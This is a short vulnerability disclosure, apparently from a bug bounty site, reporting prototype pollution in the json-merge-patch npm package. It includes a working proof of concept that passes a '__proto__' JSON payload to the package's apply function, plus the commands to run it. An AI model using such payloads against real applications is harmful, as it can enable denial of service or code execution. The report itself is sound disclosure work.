Prototype Pollution in pierreinglebert/json-merge-patch


Reported on

Sep 14th 2020


json-merge-patch is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Information Disclosure/DoS/RCE.

Proof of Concept

  1. Create the following PoC file:
// poc.js
let jsonmergepatch = require("json-merge-patch");
jsonmergepatch.apply({}, JSON.parse('{ "__proto__": { "polluted": "Yes! Polluted" }}'));
  1. Execute the following commands in another terminal:
npm i json-merge-patch # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Yes! Polluted


to join this conversation